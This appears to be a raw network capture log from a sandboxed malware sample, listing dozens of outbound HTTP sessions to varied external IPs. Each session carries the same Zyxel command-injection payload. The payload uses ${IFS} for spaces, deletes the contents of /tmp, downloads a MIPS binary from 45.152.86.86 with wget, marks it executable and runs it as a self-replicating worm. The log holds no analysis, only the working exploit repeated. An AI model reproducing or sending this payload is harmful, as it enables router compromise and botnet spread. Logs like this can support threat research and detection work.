                                        Mar 31, 2024 09:21:24.947691917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5004192.168.2.2333382167.66.149.137443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:24.947735071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5005192.168.2.235405887.81.238.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:24.947771072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5006192.168.2.234726217.238.42.165443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:24.947802067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5007192.168.2.2354954201.127.79.236443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:24.947885036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5008192.168.2.2342640108.207.250.14443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:24.947912931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5009192.168.2.2348336199.193.82.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:24.947977066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5010192.168.2.2354078206.71.174.167443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:24.948025942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5011192.168.2.235061894.167.206.171443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:24.948074102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5012192.168.2.2354532205.54.125.73443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:24.948115110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5013192.168.2.235172837.216.72.209443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:24.948170900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5014192.168.2.2354876157.183.211.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:24.948208094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5015192.168.2.2334964114.181.118.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:24.948263884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5016192.168.2.2340090155.50.234.153443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:24.948297024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5017192.168.2.2335444109.44.152.173443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:24.948348999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5018192.168.2.2343844135.95.47.176443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:24.948920012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5019192.168.2.2337822151.46.16.209443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:25.951879978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5020192.168.2.2346752203.187.30.56443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:25.952003002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5021192.168.2.2344230118.37.192.222443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:25.952037096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5022192.168.2.2338256146.230.223.100443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:26.955085993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5023192.168.2.235612090.148.201.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:26.955138922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5024192.168.2.2338838193.219.148.235443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:26.955172062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5025192.168.2.2357672172.9.66.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:27.958424091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5026192.168.2.2356888171.214.109.211443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:27.958467960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5027192.168.2.2355448157.209.17.215443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:27.958517075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5028192.168.2.2338340171.199.226.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:27.958575010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5029192.168.2.233415858.197.187.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:27.958801985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5030192.168.2.2356662185.255.198.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.962728024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5031192.168.2.233328460.163.53.92443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.962769985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5032192.168.2.235527291.185.54.31443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.962821960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5033192.168.2.234434679.178.145.219443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.962887049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5034192.168.2.234689891.96.140.24443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.962941885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5035192.168.2.235865681.32.130.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.963010073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5036192.168.2.2359042179.133.176.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.963082075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5037192.168.2.233566436.171.134.89443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.965564013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5038192.168.2.2354166181.64.136.153443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.965641022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5039192.168.2.233882264.102.44.162443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.965668917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5040192.168.2.2333308168.184.140.111443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.965723038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5041192.168.2.2359252222.227.133.8443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.965786934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5042192.168.2.2343226110.141.78.65443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.965827942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5043192.168.2.235891252.127.214.169443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.965883017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5044192.168.2.234174680.87.193.255443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.965940952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5045192.168.2.234485832.24.153.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.965998888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5046192.168.2.2359188131.193.106.235443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.966048956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5047192.168.2.2340836217.207.124.204443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.966094017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5048192.168.2.235436612.93.3.130443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.966140032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5049192.168.2.2333210219.214.241.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.966169119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5050192.168.2.2339300171.236.177.126443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.966237068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5051192.168.2.2343220122.181.62.69443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.966300011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5052192.168.2.2341218103.216.156.1443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.966360092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5053192.168.2.2346454174.204.3.108443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.966391087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5054192.168.2.2351540182.132.190.45443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.966439009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5055192.168.2.2336432206.14.133.209443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.966494083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5056192.168.2.2335788140.229.67.81443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.966552973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5057192.168.2.235771699.164.140.172443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.966615915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5058192.168.2.2353060114.165.43.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.966636896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5059192.168.2.2355566173.229.212.166443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.966701031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5060192.168.2.2353300184.31.1.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.966742992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5061192.168.2.2349904131.82.104.199443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.966784000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5062192.168.2.235138849.96.238.228443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.966840029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5063192.168.2.2355826120.201.213.182443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.966896057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5064192.168.2.234911889.48.128.191443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.966948986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5065192.168.2.2344696155.166.201.11443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.967000008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5066192.168.2.235873051.14.246.26443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.967037916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5067192.168.2.234743037.185.73.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.967068911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5068192.168.2.233521693.11.15.35443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.967114925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5069192.168.2.2339908176.203.20.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.967170000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5070192.168.2.2357554140.100.238.190443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.967204094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5071192.168.2.2359484147.236.242.236443
                                        TimestampBytes transferredDirectionData
